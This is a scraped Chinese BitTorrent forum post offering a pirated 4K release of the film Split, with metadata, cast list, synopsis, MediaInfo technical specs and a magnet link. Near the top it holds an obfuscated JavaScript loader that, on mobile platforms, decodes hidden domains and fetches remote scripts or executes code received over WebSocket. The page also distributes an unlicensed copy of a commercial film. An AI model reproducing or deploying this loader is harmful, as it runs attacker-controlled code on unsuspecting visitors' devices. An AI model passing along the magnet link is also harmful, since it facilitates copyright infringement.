分裂[双语字幕].Split.2016.2160p.HDR.UHD.BluRay.DTS-HD.MA.5.1.x265-10bit-迅雷下载 22.98GB

版主小s 28天前 175

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 分裂/思·裂(港)

◎片 名 Split

◎年 代 2016

◎产 地 美国

◎类 别 悬疑 / 惊悚 / 犯罪

◎语 言 英语

◎上映日期 2016-12-26(奇幻电影节) / 2017-01-20(美国)

◎豆瓣评分 7.4/10 from 109101 users

◎豆瓣链接 https://movie.douban.com/subject/26600660/

◎片 长 117分钟

◎导 演 M·奈特·沙马兰 M. Night Shyamalan

◎编 剧 M·奈特·沙马兰 M. Night Shyamalan

◎主 演 詹姆斯·麦卡沃伊 James McAvoy

安雅·泰勒-乔伊 Anya Taylor-Joy

贝蒂·巴克利 Betty Buckley

海莉·露·理查森 Haley Lu Richardson

杰西卡·苏拉 Jessica Sula

丽兹·科菲 Izzie Coffey

布拉德·威廉姆·亨克 Brad William Henke

塞巴斯蒂安·阿塞勒斯 Sebastian Arcelus

尼尔·哈夫 Neal Huff

尤基·华盛顿 Ukee Washington

M·奈特·沙马兰 M. Night Shyamalan

罗丝玛丽·霍华德 Rosemary Howard

琳·勒内 Lyne Renee

布鲁斯·威南特 Bruce Winant

罗伯特·比齐克 Robert Bizik

玛丽亚·布雷曼 Maria Breyman

杰夫·巴克纳 Jeff Buckner

大卫·尼尔里姆 David Kneeream

金·迪莱克特 Kim Director

老约翰·吉拉德 John Jillard Sr.

迈克尔·J·克雷西克 Michael J. Kraycik

乔恩·道格拉斯·雷尼 Jon Douglas Rainey

莎伊娜·瑞恩 Shayna Ryan

布鲁斯·威利斯 Bruce Willis

斯特林·K·布朗 Sterling K. Brown

尼果兹·简·安亚乌 Ngozi Jane Anyanwu

◎标 签 多重人格 | 惊悚 | 悬疑 | 人格分裂 | 心理 | 美国 | 精神分裂 | 犯罪

◎简 介

凯西(安雅·泰勒-乔伊 Anya Taylor-Joy 饰)是一个显得和同龄人格格不入的怪女孩,某日,她和同学克莱尔(海莉·路·理查森 Haley Lu Richardson 饰)、玛西亚(杰西卡·苏拉 Jessica Sula 饰)一起准备坐车回家,哪知道遭到了一神秘男子的袭击和绑架,三人被囚禁在灰暗阴冷的地下室中,面临着未知的凶险命运。

绑架三个女孩的,是一个名叫凯文(詹姆斯·麦卡沃伊 James McAvoy 饰)的男人,实际上,他是一位多重人格患者,支配着他的身体的人格,竟有23种之多。弗莱彻(贝蒂·巴克利 Betty Buckley 饰)是凯文的主治医生,她发现,凯文体内的人格之间产生了分歧,更糟糕的是,第24种人格正在慢慢形成,这个人格强壮、邪恶、残忍,一旦他获得了凯文身体的主导权,不仅三个女孩要遭殃,就连凯文本身都将性命不保。

◎获奖情况

第26届MTV电影奖 ?(2017)

MTV电影奖最佳表演(提名) 詹姆斯·麦卡沃伊

第4届豆瓣电影年度榜单 ?(2017)

最受关注的非院线电影(提名)

评分最高的惊悚/犯罪片(提名)

4月最受关注电影(提名)

  1. General

  2. Unique ID : 282659369407755237067861794508232934775 (0xD4A636E052BF8225BA732968E0E74577)

  3. Complete name : Split.2016.2160p.HDR.UHD.BluRay.DTS-HD.MA.5.1.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 23.0 GiB

  7. Duration : 1 h 57 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 28.1 Mb/s

  10. Movie name : Split 2016 2160p HDR UHD BluRay DTS-HD MA 5.1 x265-10bit-HDS

  11. Encoded date : UTC 2021-07-02 12:15:35

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 57 min

  22. Bit rate : 24.6 Mb/s

  23. Width : 3 840 pixels

  24. Height : 2 160 pixels

  25. Display aspect ratio : 16:9

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.124

  32. Stream size : 20.1 GiB (88%)

  33. Title : [email protected]

  34. Writing library : x265 - H.265/HEVC codec

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.2020

  39. Transfer characteristics : PQ

  40. Matrix coefficients : BT.2020 non-constant

  41. Mastering display color primaries : Display P3

  42. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  43. Maximum Content Light Level : 739 cd/m2

  44. Maximum Frame-Average Light Level : 331 cd/m2


  45. Audio

  46. ID : 2

  47. Format : DTS XLL

  48. Format/Info : Digital Theater Systems

  49. Commercial name : DTS-HD Master Audio

  50. Codec ID : A_DTS

  51. Duration : 1 h 57 min

  52. Bit rate mode : Variable

  53. Bit rate : 3 408 kb/s

  54. Channel(s) : 6 channels

  55. Channel layout : C L R Ls Rs LFE

  56. Sampling rate : 48.0 kHz

  57. Frame rate : 93.750 FPS (512 SPF)

  58. Bit depth : 24 bits

  59. Compression mode : Lossless

  60. Stream size : 2.79 GiB (12%)

  61. Title : English

  62. Language : English

  63. Default : Yes

  64. Forced : No


  65. Text #1

  66. ID : 3

  67. Format : PGS

  68. Muxing mode : zlib

  69. Codec ID : S_HDMV/PGS

  70. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  71. Duration : 1 h 51 min

  72. Bit rate : 25.2 kb/s

  73. Count of elements : 1988

  74. Stream size : 20.1 MiB (0%)

  75. Title : CHS

  76. Language : Chinese

  77. Default : Yes

  78. Forced : No


  79. Text #2

  80. ID : 4

  81. Format : PGS

  82. Muxing mode : zlib

  83. Codec ID : S_HDMV/PGS

  84. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  85. Duration : 1 h 51 min

  86. Bit rate : 25.6 kb/s

  87. Count of elements : 1988

  88. Stream size : 20.4 MiB (0%)

  89. Title : CHT

  90. Language : Chinese

  91. Default : No

  92. Forced : No


  93. Text #3

  94. ID : 5

  95. Format : PGS

  96. Muxing mode : zlib

  97. Codec ID : S_HDMV/PGS

  98. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  99. Duration : 1 h 51 min

  100. Bit rate : 43.9 kb/s

  101. Count of elements : 1988

  102. Stream size : 35.0 MiB (0%)

  103. Title : CHS&ENG

  104. Language : Chinese

  105. Default : No

  106. Forced : No


  107. Text #4

  108. ID : 6

  109. Format : PGS

  110. Muxing mode : zlib

  111. Codec ID : S_HDMV/PGS

  112. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration : 1 h 51 min

  114. Bit rate : 44.3 kb/s

  115. Count of elements : 1988

  116. Stream size : 35.3 MiB (0%)

  117. Title : CHT&ENG

  118. Language : Chinese

  119. Default : No

  120. Forced : No


  121. Menu

  122. 00:00:00.000 : en:Chapter 01

  123. 00:06:08.451 : en:Chapter 02

  124. 00:14:19.025 : en:Chapter 03

  125. 00:20:49.373 : en:Chapter 04

  126. 00:24:14.536 : en:Chapter 05

  127. 00:28:37.049 : en:Chapter 06

  128. 00:35:47.979 : en:Chapter 07

  129. 00:42:35.386 : en:Chapter 08

  130. 00:49:06.068 : en:Chapter 09

  131. 00:54:09.413 : en:Chapter 10

  132. 01:00:24.496 : en:Chapter 11

  133. 01:06:22.562 : en:Chapter 12

  134. 01:12:31.222 : en:Chapter 13

  135. 01:19:35.771 : en:Chapter 14

  136. 01:25:25.829 : en:Chapter 15

  137. 01:29:16.560 : en:Chapter 16

  138. 01:34:08.226 : en:Chapter 17

  139. 01:40:45.998 : en:Chapter 18

  140. 01:47:40.287 : en:Chapter 19

  141. 01:52:26.740 : en:Chapter 20


TAGS 惊悚 悬疑 犯罪

磁力链:
  • magnet:?xt=urn:btih:1586FB44ED69BA6008FD74BB3D2CD82768C92732
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖